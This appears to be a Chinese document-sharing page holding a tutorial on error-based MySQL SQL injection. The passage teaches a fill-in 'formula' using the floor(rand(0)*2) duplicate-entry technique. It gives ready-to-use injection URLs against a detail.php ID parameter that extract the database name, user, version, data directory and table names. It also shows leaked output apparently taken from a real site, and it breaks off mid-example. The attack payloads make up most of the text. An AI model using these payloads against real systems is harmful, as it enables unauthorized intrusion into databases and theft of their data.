MySQL错误回显套公式法注入.docVIP

下载本文档

5
0
约5.5千字
约 6页
2017-04-06 发布于贵州
举报
版权申诉

MySQL错误回显套公式法注入.doc

1、本文档共6页，可阅读全部内容。
2、原创力文档（book118）网站文档一经付费（服务费），不意味着购买了该文档的版权，仅供个人/单位学习、研究之用，不得用于商业用途，未经授权，严禁复制、发行、汇编、翻译或者网络传播等，侵权必究。
3、本站所有内容均由合作方或网友上传，本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺！文档内容仅供研究参考，付费前请自行鉴别。如您付费，意味着您自己接受本站规则且自行承担风险，本站不退款、不进行额外附加服务；查看《如何避免下载的几个坑》。如果您已付费下载过本站文档，您可以点击这里二次下载。
4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等，请点击“版权申诉”（推荐），也可以打举报电话：400-050-0827(电话支持时间：9:00-18:30)。
5、该文档为VIP文档，如果想要下载，成为VIP会员后，下载免费。
6、成为VIP后，下载本文档将扣除1次下载权益。下载后，不支持退款、换文档。如有疑问请联系我们。
7、成为VIP后，您将拥有八大权益，权益包括：VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
8、VIP文档为合作方或网友上传，每下载1次，网站将根据用户上传文档的质量评分、类型等，对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档

MySQL错误回显套公式法注入MySQL错误回显套公式法注入

MySQL错误回显套公式法注入ySQL报错回显爆数据，其实主要就是套公式，公式分为4部分 1,逻辑错误部分，也就是将GET变量取值变为逻辑错误值，例如.php?id=0或者.php?id=12+and+1=2 2,固定SQL联合查询语句，语句为：(核心)union select 1 from (select+count(*),concat(floor(rand(0)*2),(注入爆数据语句))a from information_schema.tables group by a)b 3,注释语句，将整个语句后面的部分注释掉，可以用/*注释符，也可以用--终止符，也可以用%23这个#字符 4,注入爆数据语句，基本格式就是select XX from YY的格式。 ------------------------------------------------------------------------------------------------------------------ 注意了！！！这4个固定公式唯一要注意的是最后一个，最后一个每次只能爆单条数据，不能updata 不能insert into 不能load_file() 不能group_concat()，有的concat()也不能用=======》嚓这样爆数据的话，就要加一个limit x,y的限制条件也就是select XX from YY limit a,ba是从第几条开始，从0开始为以一条，b为目标一共几条数据，这里固定为1，也就是说limit 0,1是第1条数据，limit 1,1是第2条数据，一次类推。 ---------------------------------------------------------------------------------------------------------------- 2.具体的实践~~~ 上面的逻辑你搞不清楚不要紧，你可以先看注入语句再回头研究每个语句的含义 MySQL显示当前数据库名，登陆用户，数据库版本和数据路径的语句是： select concat(0x3a,database(),0x3a,user(),0x3a,version(),0x3a,@@datadir) 将上面的SQL语句作为语句4带入供述就得到注入语句： /detail.php?ID=0+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+concat(0x3a,database(),0x3a,user(),0x3a,version(),0x3a,@@datadir)))a+from+information_schema.tables+group+by+a)b ============》符合了前面的注意我们访问一下就得到了：SQL语句错误: Duplicate entry 1:mc110_mc110:mc110@localhost:5.1.34:/usr/local/mysql/var/ for key group_keyDuplicate entry后面的引号中的就是数据，固定去掉数字“1”mc110_mc110是数据库名mc110@localhost是数据库用户5.1.34是版本/usr/local/mysql/var/这里是MySQL的数据路径然后我们继续看MySQL显示当前所有数据库的表？？语句为：select table_name from information_schema.tables where table_schema = database() limit 0,1或者select table_name from information_schema.columns where table_schema = database() limit 0,1 将这句SQL语句作为上面公式中的4，就得到注入语句： /detail.php?ID=0+union+select+1+from+(select+count(*),concat(floor(rand(0)*2),(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1))a+from+information_schema.tables+group+by+a)b 复制代码访问得到：SQL语句错误: Duplicate entry 15epe_admin for key